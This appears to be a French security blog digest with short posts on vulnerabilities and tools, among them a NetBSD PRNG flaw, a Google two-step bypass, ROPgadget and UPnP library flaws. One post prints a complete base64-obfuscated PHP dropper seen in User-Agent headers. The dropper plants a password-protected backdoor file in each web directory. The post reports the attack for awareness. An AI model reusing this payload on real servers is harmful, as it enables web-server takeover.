Via HN :
Si vous tournez actuellement sous un NetBSD 6.0 et des poussières, il est conseillé de vous mettre immédiatement à jour car votre système et/ou vos données sont potentiellement piratables.
En effet en raison d’une bête erreur de parenthèse dans le code, le pseudo générateur d’aléa est cassé, où comme le dit l’advisory publié :
Due to a programming error, pseudorandom numbers supplied with a warning of “insufficient entropy at creation” may only contain sizeof(int) bits of cryptographic randomness.
Conclusions : passez tout de suite à NetBSD 6.1 et régénérez toutes vos clés cryptographiques (SSH, GPG, certificats & compagnie)
BSD, Cryptographie, Faille / Exploit
Une petite technique simple mais il fallait y penser : via un élément onclick sur un lien on peut réécrire le lien en question pour lui donner une nouvelle adresse (tag src).
L’internaute est alors dirigé vers… le nouveau lien et non vers celui qu’il pensait suivre.
Faille / Exploit, phishing
Deux chercheurs russes s’inquiètent de la faiblesse des modems 3G/4G fabriqués par les chinois.
Voici un extrait:
Malware running on the computer could detect the model and version of the active 3G modem and could write an image with malicious customizations to it using such tools. That modem would then compromise any computer it’s used on.
Source de l’article
Electronique / RFID, Faille / Exploit
Via HN :
Le blog DuoSecurity a révélé que le mécanisme d’authentification “two-step” offert par les services Google était bypassable via une faille dans l’utilisation des ASP (Application Specific Password) qui n’étaient pas si spécifiques que cela…
Faille / Exploit, Google
Je viens de remarquer ça dans les logs et ça vous intéressera peut-être 
Visiblement une ou plusieurs personnes s’amusent à scanner des sites web en passant du code PHP malicieux dans l’entête HTTP User-Agent. Impossible pour le moment de savoir si les attaquants ont connaissance d’une faille dans une appli web donnée où s’ils espèrent que ça mordera à l’hameçon (sur un malentendu ça peut marcher ?)
Le code est le suivant :
<?php eval(base64_decode(\"QGluaV9zZXQoJ2FsbG93X3VybF9mb3BlbicsIDEpOw0KDQphZGRMb2FkZXIoKTsNCiRkYXRhID0g
QG9wZW5kaXIoJy4nKTsNCg0Kd2hpbGUgKCRmaWxlID0gQHJlYWRkaXIoJGRhdGEpKQ0Kew0KCSRmaWx
lID0gdHJpbSgkZmlsZSk7DQoJaWYgKCEkZmlsZSB8fCBwcmVnX21hdGNoKCcvXlwuKyQvJywgJGZpbG
UpIHx8ICFpc19kaXIoJGZpbGUpKSBjb250aW51ZTsNCglhZGRMb2FkZXIoJGZpbGUpOw0KfQ0KDQpAY
2xvc2VkaXIoJGRhdGEpOw0KDQpmdW5jdGlvbiBhZGRMb2FkZXIoJGRpciA9ICcnKQ0Kew0KICAgIGlm
ICgkZGlyKSAkZGlyIC49ICcvJzsNCiAgICBAY2htb2QoJGRpciwgNzc3KTsNCiAgICANCiAgICAkZnA
gPSBmb3BlbigieyRkaXJ9ODlmNjEyMWZlYmEwMmUyY2NkZGI0YmExOWExMTU3ZTIucGhwIiwgInciKT
sgDQogICAgZndyaXRlKCRmcCwgYmFzZTY0X2RlY29kZSgnUEQ5d2FIQU5DZzBLUUdsdWFWOXpaWFFvS
jJGc2JHOTNYM1Z5YkY5bWIzQmxiaWNzSURFcE93MEtRR2x1YVY5elpYUW9KMlJsWm1GMWJIUmZjMjlq
YTJWMFgzUnBiV1Z2ZFhRbkxDQTJNQ2s3RFFwQWFXNXBYM05sZENnbmJXRjRYMlY0WldOMWRHbHZibDk
wYVcxbEp5d2dOakFwT3cwS1FITmxkRjkwYVcxbFgyeHBiV2wwS0RZd0tUc05DZzBLSkdSaGRHRWdQU0
JBZFc1elpYSnBZV3hwZW1Vb1ltRnpaVFkwWDJSbFkyOWtaU2gwY21sdEtFQWtYMUJQVTFSYkoyUmhkR
0VuWFNrcEtUc05DZzBLYVdZZ0tFQWhhWE5mWVhKeVlYa29KR1JoZEdFcElIeDhJRzFrTlNna1pHRjBZ
VnNuY0dGemMzZHZjbVFuWFNrZ0lUMGdKMlF6WkdZME16bGpNMlUwWWpKak5ERTVNakJrT0dVeU56TXp
NVEV6TWpNMkp5a2daWGhwZERzTkNtbG1JQ2hBSkdSaGRHRmJKMk52WkdVblhTa2daWFpoYkNoaVlYTm
xOalJmWkdWamIyUmxLQ1JrWVhSaFd5ZGpiMlJsSjEwcEtUc05DbWxtSUNoQUpHUmhkR0ZiSjJOb1pXT
nJYMk52WkdVblhTa2djSEpwYm5RZ0pHUmhkR0ZiSjJOb1pXTnJYMk52WkdVblhUc05DZzBLUHo0PScp
KTsNCglmY2xvc2UoJGZwKTsNCg0KCWlmIChmaWxlX2V4aXN0cygieyRkaXJ9ODlmNjEyMWZlYmEwMmU
yY2NkZGI0YmExOWExMTU3ZTIucGhwIikpDQoJew0KICAgICAgICAkY2sgPSAiMTgyMzY0OTM2NTgyMD
M1NCI7DQoJICAgIHByaW50ICIkY2s6eyp9OiRkaXI6eyp9OiI7DQoJCWV4aXQ7DQoJfQ0KfQ==\")); ?>
Le code dé-obfusqué peut être trouvé ici. Quelques personnes l’ont déjà remarqué sur la période des 10 derniers jours.
Faille / Exploit
Bricks est une appli web intentionnellement vulnérable basée sur PHP/MySQL (dans le même ordre d’idée que Mutillidae).
Page du projet par OWASP.
Faille / Exploit, Tools
Une nouvelle version de ROPgadget tool (un outil qui facilite l’exploitation par Return Oriented Programming en cherchant des gadgets dans un binaire) est disponible.
Nouveautés de la v4.0.0 :
Addition of 64 bit linux support for ROP exploit generation.
Addition of 64 bit support for ROP gadget searching.
Addition of Windows PE file loading for gadget searching.
Addition of detection of shared libraries and improved code gen for them.
Generation of execve ROP exploits with arbitrary argument vectors.
Payload generation in PHP, C and Perl as well as improved generation for python.
Color disable/enable switch.
Improved user friendliness.
Vastly increased ROP searching speed.
Code restructuring for easing addition of new architectures/platforms.
General refacoring and code friendiness.
Faille / Exploit, Reverse Engineering / Coding, Tools
Via /r/netsec :
L’équipe de Metasploit a publié les résultats de recherches de vulnérabilités qu’ils ont effectuées sur les librairies UPnP existantes.
Et visiblement c’est pas du joli : des librairies très fréquentes installées sur de nombreux équipements réseau comme Portable UPnP SDK et la lib miniupnp contiennent des failles sévères permettant une exploitation distante (crash ou prise de contrôle).
Ces failles sont maintenant corrigées mais les périphériques touchées ne sont généralement pas mis à jour, qui plus est certains répondent à un DISCOVER depuis l’Internet ^_^.
Pour le coup MSF a intégré un module de scan UPnP dans son framework et a mis à disposition ScanNow, un outil gratuit sous Windows permettant de détecter les devices vulnérables.
Faille / Exploit, Metasploit, White Paper
Le buzz autour de la sortie de Mega a suscité bien des curiosités, notamment chez les chercheurs sécu qui sont allés chacun de leur critique.
Comme promis par Dotcom sur Twitter, une note de blog a été faite pour répondre à ces critiques.
Si certains points apportent une bonne clarification, d’autres explications sont moins convaincantes et d’autres restent sans réponse.
Un article de PCI passe en revu les réponses de l’équipe de Mega sur les critiques reçues.
Comme toujours avec ce type de service, le plus sûr est de chiffrer ses documents en local avant de les envoyer sur le cloud.
On peut espérer que des outils comme BoxCryptor ajouterons Mega aux services supportés.
Cryptographie, Faille / Exploit, megaupload
Via V3 :
Le bien-connu site PacketStorm Security a ouvert une section bug bounty sur son site pour rémunérer les auteurs de code d’exploitation.
Mais Packet Storm prône le full-disclosure et indique que tous les sploits seront rendus publics après 60 jours.
Faille / Exploit